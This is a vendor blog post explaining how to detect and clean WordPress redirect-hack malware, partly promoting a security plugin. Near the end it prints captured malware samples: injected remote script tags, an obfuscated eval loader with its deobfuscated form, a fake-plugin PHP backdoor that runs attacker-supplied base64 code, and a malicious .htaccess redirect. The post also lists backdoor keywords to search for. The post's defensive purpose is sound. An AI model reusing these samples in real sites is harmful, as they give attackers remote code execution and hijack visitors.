How To Remove Malicious Redirects From Your Site?

Nov 17, 2021

by

How To Remove Malicious Redirects From Your Site?

Nov 17, 2021

by

Is your WordPress website redirecting to another site right after you visit it? It can be confusing and stressful when this happens because there is no way to figure out what exactly is happening. These unauthorized redirects are a sign of a WordPress redirect hack on your website. 

Do not worry, because we can help you fix this.

First of all, you need to confirm that your WordPress site is hacked by scanning it. 

WordPress hacked redirect issue can cause a lot of nuisance as the website traffic gets diverted, your organic traffic suddenly drops, and the bounce rate skyrockets. But none of it does as much damage as losing the trust of your customers. Therefore, fixing these hacks quickly is pertinent. The more time you take to fix the WordPress redirection hack, the more damage it will cause.

TL;DR: Fix your WordPress site redirecting to spam with a best-in-class security plugin quickly. The longer you let a hack stay on your website, the worse it will get. Therefore, it is important to act quickly and clean up your website with MalCare.

What is WordPress redirect hack?

A WordPress redirect hack is a symptom of malware being injected into your WordPress website. This malware redirects all your visitors to spam websites, which usually sell illegal items or pharma products that aren’t allowed to be marketed normally or are heavily restricted. In fact, advertising restricted products or services can get a Google Ads account suspended as well. 

WordPress hacked redirect infection

WordPress hacked redirect is a very common malware symptom affecting thousands of websites every day. While this hack is fixable, it is important to do so fast. Time is of utmost importance when dealing with hacks because the more you wait, the more files and database tables on your site are going to get affected.

How to know if your website is being redirected to another site?

If your WordPress site is redirecting to another spam site, it is a pretty good indication that your website is infected with the redirect hack malware. But the nature of this hack is such that it may not happen every time. In fact, hackers can program it in a way that only happens once for each IP address so that the admin may believe that it was a one-time issue. But the possibility of it being an incorrect redirect or a one-time glitch is almost negligible. 

Therefore, we need to confirm the redirect hack before we can start fixing it. In order to figure out if your website has the WordPress redirect hack, you need to start by looking out for common symptoms and then confirm it with a proper scan. 

Look out for symptoms of WordPress redirect hack

There is no one symptom that can confirm a hack for you. WordPress redirect hack malware can manifest in a number of ways, and it is absolutely not predictable. However, some symptoms keep recurring over several cases. So if you notice more than two of these symptoms, chances are that your website has been hacked. 

  • WordPress site redirecting to spam site: The first and the most obvious symptom of a WordPress hacked redirect infection is the redirect itself. Some redirects may take your website visitors to a spam site whereas others may redirect you from the login page, effectively locking you out of your website. 
    • Automatic redirects: The most common type of redirects are automatic redirects. These directly take your visitors to spam sites from the website or even from Google search results. 
    • Link redirects: Link redirects change the destination of the visitor when they click on a link. Given that visitors expect to find a specific landing page after clicking on a link, this type of redirect is especially malicious. 
    • Mobile-only redirects: These redirects only take place if someone is visiting your website through a mobile device. 
  • Google results flag your website: Google is ultra-cautious about its users’ search experience and wants it to be safe. So if Google suspects malware on your website, it will show a ‘This site may be hacked’ message underneath the search results for your website. 
  • Google blacklist: Google blacklists over 10,000 websites every day to make sure that no dangerous website can harm its users. Getting on Google’s blacklist is a disaster for your website’s SEO efforts, as Google will delist your website. Moreover, many other browsers, search engines, and web hosts rely on Google’s blacklist to check for dangerous sites.
  • Google Ads flag scripts on your website: If you’re running ads on your website, Google can detect any redirection scripts on your page and flag your page. Google is especially careful about the safety of the ads that it runs, so the chances of false positives are very low. 
  • Web host has suspended your account: While web hosts may suspend your account for a number of reasons, malware is the most common one. You might receive an email from your web host regarding the reason for suspension. If not, you can always reach out to them for clarification, and ask them for the scan reports so that you have a head start on locating the malware. 
  • Visitor feedback: As we discussed before, malware is designed to be hidden from the admin. So you may not notice any symptoms at all, but your visitors will. So pay attention to any complaints or feedback that may come from your website visitors about random redirects.

If you notice these symptoms, do not panic. Instead, try to record information regarding these symptoms. Information can help you identify the exact nature of the hack and resolve it at the earliest.

Confirm the WordPress hacked redirect infection 

You know what to look out for, and have a fair idea of how hacks may manifest on your WordPress site, but it is still extremely important to confirm the WordPress redirect hack if you suspect it. Symptoms are not a foolproof way to do this, therefore, scanning is pertinent. 

Deep scan your website using security plugin

The fastest and easiest way to scan your website for hacks is with a security plugin like MalCare. MalCare seamlessly syncs with your WordPress site and scans for hidden malware that is not easily discoverable. Scanning with it is as easy as this:

  1. Install MalCare on your website
  2. Allow MalCare to sync with your website
  3. Click on ‘Scan site’

MalCare WordPress malware scanner

You can set up MalCare for scheduled scans and let it scan your website regularly. If your website is hacked, it will alert you as soon as the hack is detected.

Scan using an online scanner

Online scanners are a great tool to use as the first step of your diagnostic process. These scanners go through the publicly visible parts of your website and scan them for malware. Given that malware can hide anywhere on your WordPress site, these are not entirely effective for complete diagnostics but can be used alongside other methods. 

Scan WordPress site manually

Scanning for WordPress hacked redirect malware manually is more than just tedious. And we would highly advise you against doing this. A security plugin can do this a lot more effectively and within a fraction of the time. 

Manual scanning is basically parsing through every line of your website code looking for ‘junk code.’ Given that Malicious code is not consistent or even specific, it is akin to looking for a needle in a haystack. But if you need to scan manually, this is how you can do it. 

One of the easiest ways to look for malware manually is to look at the recently modified files on your website. If you haven’t modified said files, chances are that they are infected. Make sure to repeat this process for the database as well.

However, this trick may not always work, as hackers can change the timestamps on files to mislead you, sometimes setting them back several months or days. 

Where to locate redirect malware

The WordPress redirect malware, like any other kind of malware, can hide anywhere on your WordPress site. And given that there are variants of the redirect malware, the code can look different for each one. So we really cannot offer an exact blueprint of code for you to look for, but if you understand your website code, you can look for strange code in the following places.

Files-

  • WordPress core files:  The two primary files in the WordPress core are the wp-admin and the wp-includes files. These files do not include any user content, so they should be identical to the fresh installs you can get on the WordPress repository. Make sure that the version you are comparing your website with, is the same as the one installed on your site. If you find any extra code on these files, it could be malware.

The next file you need to look for is the .htaccess file. This file carries the traces of the WordPress mobile redirect hack, if it exists on your website. You can look for any redirect scripts on this file, and note them for a cleanup.

  • Active theme files: Your theme files are also a good place to look for malware. First, ensure that only one theme is active on your website, and then look into the header.php, footer.php, and functions.php files in the active theme folder. You can compare the code to fresh installs of the theme, but bear in mind that customizations can show up as extra code.
  • Plugin files: Malware can hide as fake plugins on your website to throw you off. A good way to look for fake plugins, is by going to the wp-contents folder and looking at all the plugin files present there. If you notice any duplicates, or odd named plugins, chances are that it is malware. For eg., we recently came across these

/wp-content/plugins/wp-zzz/wp-zzz.php

/wp-content/plugins/Plugin/plug.php

Note: If you use nulled themes or plugins on your WordPress site, you don’t need to look further, because you have almost certainly been hacked through them. 

Database-

  • wp-posts table: Now you need to go through your database. In your wp-posts table, look into a good number of posts, if you cannot go through all of them. Because even though malware usually shows up on every single page, hackers can hide them to make it difficult for you to find. 
  • wp-options table: In this table, look for the siteurl. If it isn’t your website URL, chances are that redirect malware has altered it to point to a spam website instead. 

Other ways to look for malware

While scanning is the best way to confirm a WordPress redirect hack, there are other ways in which you can look for malware on your WordPress site. As the symptoms of hacks are not consistent, admin often leave hacks unattended for longer than they should. So regularly monitoring your website for any suspicious activity is extremely important. 

Here are some ways in which you can look for the redirect malware on your website.

  • Use an incognito browser to visit your website. Hackers often design malware so that the symptoms aren’t visible to the admin. This way, you can see what the regular visitors see.
  • Check activity logs to see if you can find any unusual activity such as the creation of new posts or escalation of user privileges. If you don’t have an activity log, consider getting one. It is an invaluable aid for debugging anything that goes wrong on your website.  
  • Check Google search console and look up the security issues tab to see if Google has flagged any malware on your website.

How to remove WordPress hacked redirect infection from your site

Looking for and identifying malware on your website is only half the battle won. Now comes the most important part, which is the clean-up. Removing WordPress hacked redirect infection from your website can be done in two ways. You can either use a security plugin like MalCare, which will take care of all the heavy lifting for you and clean up your website in minutes, or you can do it manually. 

While manual clean-ups are possible, we absolutely do not recommend this course of action. There is a lot that can go wrong and it is a time-consuming endeavor. In the case of hacks, time is of the essence, so using a security plugin is the best course of action.

Clean your WordPress site with a security plugin

If you have already scanned your website with MalCare, we will show you how to clean up your website in the next section. If you have not, you will first need to install MalCare on your WordPress site and scan it. However, you can pick any security plugin to do this.

If your WordPress site is redirecting from the wp-login page, and you cannot access it to install the plugin, reach out to us and our emergency cleanup service will take care of it for you.

Now that you have MalCare installed, your scan will have alerted you of a hack. Now all you need to do is upgrade your accounts and click on the ‘Clean Site’ button. 

MalCare WordPress malware removal

It is as simple as that. MalCare will clean up your site within minutes. 

Remove redirect hack malware manually

Before we explain how you can manually clean your WordPress site, we would like to reiterate that this is not recommended, and there are numerous things that can go wrong when manually cleaning up your site. Many times, we get websites for cleanup that could have been cleaned in a matter of minutes but manual cleaning efforts broke the site and now it is a task and a half. So before you take this route, consider using a security plugin one more time. 

If you still wish to clean up your site manually, here is how you can go about it step-by-step.

  1. Backup your website with BlogVault

The first step is to back your website up, preferably on a separate server than that of your website. This is a failsafe in case the clean-up goes wrong or breaks your site. Even though your website is hacked right now, it is still a functional site, which is better than having to start from scratch.BlogVault allows you to take safe backups that are easy to restore, and stored on offsite servers. 

  1. Download clean installs of WordPress

In order to clean your WordPress site, you need a reference for clean files. So you will need to download clean installs of WordPress core, themes, and plugins from the WordPress repository. It is extremely important to match the versions of these files with the ones on your website, to make sure that the base code is the same.

  1. Reinstall WordPress core

Now comes the actual cleanup part. You start by reinstalling the WordPress core files. You can entirely replace the wp-admin and wp-includes files as they do not have any user content in them. 

The next step is to look for any strange or suspicious code in the following files: 

  • index.php
  • wp-config.php
  • wp-settings.php
  • wp-load.php
  • .htaccess

You will have to carefully remove any malware that you find in these files. Make sure that you are only deleting malware, or else your site can break or act erratically if you delete anything important. 

We cannot give you specifics on what to look for, because the malware can look like any other code. This is why you need a basic understanding of code logic to undertake manual cleanup of your site.

After you are done with this, take a look at the wp-uploads folder. Does it have any PHP files? If yes, delete them as the wp-uploads folder is not supposed to have any PHP files at all.

  1. Clean themes and plugins files

You can find the themes and plugins files in your website’s wp-contents folder. Start by comparing each theme and plugin file with the fresh installs you downloaded from the repository. You can use an online diffchecker to compare as going through every line of code manually can be a big undertaking. 

Look for any changes in your version of the files, and try to determine if this is just a result of customization or actual malware, as customizing your themes or plugins can alter the code. Now, carefully delete the malware that you have found.

Look for any fake plugins or newly discovered vulnerabilities in the plugins that you use. If you haven’t updated your files after the vulnerability has been discovered, you will have to update the plugin, and look for malware in the plugin file.

  1. Clean database tables

You will have to repeat the same process for your database tables. In order to access your database tables, you can use phpMyAdmin. Look for the malware in the following tables specifically:

  • wp-posts
  • wp-options

If you have noted down the malware in the scanning process, you can carefully delete the malicious script from your database tables and clean it up.

  1. Remove backdoors

Once the cleaning is done, you will have to fix the cause of the hack. Hacks often occur due to backdoors on your website. A backdoor is a loophole in the website code that hackers exploit to gain access to your website. Unless you remove these backdoors, your website can be hacked again just as easily.

You can look for the following keywords that often are a part of backdoors:

  • eval
  • base64_decode
  • gzinflate
  • preg_replace
  • str_rot13

However, these keywords don’t necessarily signal malware. They are sometimes used in legitimate themes and plugins as well.

  1. Reupload clean files

It is now time to reupload clean files to your WordPress site. You will need to use both File Manager and phpMyAdmin for this purpose. The process is very similar to manually restoring a backup, so you can take a look at our comprehensive guide on restoring backups for additional instruction. 

You will first have to delete the files one by one and then upload the cleaned versions to your WordPress site. 

  1. Remove cache

You are almost there. Even though you have cleaned your website, there may still be traces of malware on it. This happens because the website cache stores a version of your site for faster loading. This version could also have malware in it. Therefore, in order to completely rid your website of malware, you need to clean the cache entirely.

  1. Use a security scanner to confirm

Congratulate yourself, your clean-up is done! In order to confirm that the cleanup was successful, use a security scanner to scan your site. If it finds no traces of malware, you are good to go. If not, you may want to look into other options for cleaning.

What does the WordPress redirect hack malware look like?

There is no one way that malware appears. Especially when it comes to malware that is as versatile as the WordPress redirect. But we have a few examples to show you how it can appear on your website. It bears repeating that you should not rely on these examples for diagnosing your website, these examples are only meant to offer a reference.

  • Some code that you can find on the wp-posts table or hidden on a page header may look like this.
<script type='text/javascript' src='//www.dekernonline.nl/wp-content/count.php?s=8131599557550&#038;ver=5.7.2' id='hello_newscript5-js'></script> <script type='text/javascript' src='https://store.dontkinhooot.tw/m.js?w=085'></script> <script type='text/javascript' async src='https://db.deliverygoodstrategy.com/js.min.js?s=p&'></script> <script type='text/javascript' src='https://count.trackstatisticsss.com/stm?v=l6.0.0'></script> <script type=text/javascript src='https://dest.collectfasttracks.com/t.js'></script> <script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>

  • The wp-options table may also hide the redirect malware, which can sometimes look like this.
stat.trackstatisticsss.com dest.collectfasttracks.com gotosecond2.com ws.stivenfernando.com

  • The malware code is often obfuscated, and you will have to deobfuscate the same using online tools. The obfuscated code can look like the following.
eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,10,32,32,32,32,112,111,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32,32,118,97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10,32,32,32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,111,44,32,115,41,59,10,32,32,125,41,40,41,59));')

When deobfuscated, it looks like this.

(function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.src = 'https://js.developerstatss.ga/stat.js?v=n4'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })();

  • Malware often hides in fake plugins, and when you open the files, it looks like this.
<?php /** * Plugin Name: Wp Zzz * Plugin URI: https://wpforms.com * Description: Default WordPress plugin * Author: WPForms * Author URI: https://wpforms.com * Version: 1.6.3.1 * */ function simple_init() { $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}} } add_action('init','simple_init'); function my_custom_js() { echo '<script type="text/javascript" src="https://port.transandfiestas.ga/js.php?from=l&sid=346"></script>'; } add_action( 'admin_head', 'my_custom_js' ); add_action( 'wp_head', 'my_custom_js' );

  • Mobile specific redirect malware can look something like this. You can find it in the .htaccess file.
<IfModule mod_rewrite.c> RewriteEngine On RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.html$ https://bit.ly/3iZl8mm [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . https://bit.ly/3iZl8mm [L] </IfModule> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>

How did your site get infected with the WordPress redirect hack?

After this rollercoaster ride through cleaning up your website, you might wonder how your website got infected with the WordPress redirection hack in the first place? There are several reasons this could have happened, and we will take a look at them, but first let’s understand why websites get hacked at all.

WordPress websites are designed for functionality and customization, which means that each WordPress site is a labyrinth of code. Essentially, this code cannot be bulletproof because it is written by someone, and there is always scope for human error. So while you can make your WordPress site as close to bulletproof as possible with the right security, it is not invulnerable without the security practices.

Some of the most likely reasons for your site getting infected with the WordPress redirect hack are:

Whatever, the reason may be, you can always prevent hacks with the right security practices, and limit the damage from any malware to the bare minimum. All you need to do is buff up your website security with some simple practices.

How to prevent WordPress redirection hack in the future?

The nature of hacks is such that they keep reappearing. This is often because most people don’t realize that website security is not a one-time exercise. You need a proper plan and protective measures that will keep your WordPress website from getting hacked and redirected to spam sites again. This does not mean that you are doomed. In fact, you can avoid getting hacked if you only implement a few measures.

Use a security plugin

A security plugin is important not just to scan and clean your website, but also to protect it and alert you in time if any malware gets in. A complete security solution like MalCare offers a firewall that blocks brute force attacks, regularly scheduled automatic scans that ensure that your website health is maintained, and timely alerts that help you take action immediately if there is a security incident. 

Install SSL

SSL allows you to encrypt any communication that happens to and from your website. This means that no one can intercept the data being sent or received to your website and try to gain unauthorized access. Installing SSL will also help you improve your SEO as Google actively penalizes non-SSL sites.

Update your WordPress core, themes, and plugins

Your website is made up of code, and where there is code, there are vulnerabilities. These vulnerabilities are patched as soon as they are discovered, however. And you can protect your website from attacks by simply updating your WordPress core, themes, and plugins regularly. You can update everything safely by installing a backup plugin like BlogVault and making sure you use a staging server to check the results before pushing updates to your live site.

Choose strong passwords

Weak passwords are still the leading cause of hacks. And while it may be difficult to remember strong passwords, you don’t have to. You can use a password manager that stores all your passwords, making it easy for you to log in as well as secure your website.

Harden WordPress

There are a list of measures that WordPress recommends to secure your WordPress site better such as two-factor authentication, blocking PHP execution in certain folders, etc. These measures together are known as WordPress hardening. MalCare helps you do all of this with a click of the button, making it completely hassle-free.

Create and follow a website security plan

Finally, it is important to keep in mind that website security is an ongoing process. And in order to secure your website, you need a plan. Create a comprehensive security plan with measures and timelines, and follow it to avoid any future hacks.

Impact of WordPress site redirecting to spam sites

When your WordPress website is being redirected to another spam site, it is obviously bad for you because of the hack. But the impact of a redirect hack is much wider than bad user experience. WordPress redirection hack can cause a lot of headaches if not fixed in time.

Revenue loss

Redirects essentially break the flow of customer behavior on your website. If they were meant to visit your site and browse your products, it won’t happen because they were redirected to a spam site before they could get to the products. This affects your conversions and results in revenue loss. This loss is magnified several times if the hack is not fixed in time.

Data loss

The redirects that occur due to the malware are only one of the symptoms of the hack. The much more worrying symptom is that the hackers have access to your website now. This means that they are privy to your and your customers’ confidential data. They could choose to sell the data, or wipe it out entirely and cost you more than just money.

Customers lose trust

When a business is hacked, it often creates distrust among customers. In case of hacks that aren’t visible to the customers the damage control can be easier. But the redirect hack on your WordPress site is visible to your customers and it can lead to customers completely losing trust in the safety of your business.

SEO impact

Search engines do not want their users to accidentally visit hacked sites. So they penalize sites that have malware. This could mean they attach a warning under your website in the search results, show a big red warning before they visit it, or even completely delist you. This hampers your SEO efforts and you will definitely notice a drop in your organic traffic.

Legal repercussions

In many regions, data laws are stringent and do not allow for third-party sharing without consent. If your data is breached, even as a result of a hack, you may be liable for legal consequences.

Conclusion

A WordPress redirect hack is one of the most common hacks out there, but it is still extremely damaging for a business. The good news is that if you take action in time, you can mitigate the risks quite easily.

Security plugins are designed to help you avoid hacks like these through firewalls, and alert you instantly if it occurs. This helps you save precious hours that could be the difference between a close call and a big loss. We recommend MalCare for its ever-evolving algorithm and intelligent firewall, but using any security plugin is a good start to your website security plan.

FAQs

My website is being redirected to another site. What should I do?

If your WordPress website is redirecting to another site or spam pages, your website is most likely hacked with the WordPress redirect hack malware. You will have to confirm the hack by scanning your website for free with a security plugin like MalCare.

If it detects a hack, all you need to do is upgrade your account and click on the auto-clean button. And your site will be clean in minutes!

Why does my website redirects to spam from Google?

The most common reason for spam redirects is the WordPress hacked redirect infection. This hack redirects your visitors to spam sites in order to piggyback on your site and gain more visitors. These spam sites usually sell illegal products or pharmaceuticals that they cannot advertise directly.

How to detect a WordPress malware redirect hack?

The strongest symptom of a WordPress spam redirect hack is if your website is redirecting to a spam site. However, hackers don’t want you to find the hack, so they add conditions that make it invisible to the admin. So you may not notice the redirects at all. 

In this case, you need to scan your website with MalCare. MalCare will scan your website thoroughly and detect any hacks instantly, so that you can start the cleanup process.

How do I fix my WordPress site redirecting to spam?

In order to clean up your WordPress site that is redirecting to spam, you need to follow these instructions:

  1. Install a security plugin like MalCare on your WordPress site.
  2. Click on the ‘Scan Site’ button to start the scanning process.
  3. Once MalCare detects hacks, it will alert you. Click on the ‘auto-clean’ button.

That’s it, your website will be free of the WordPress malware redirect hack in no time.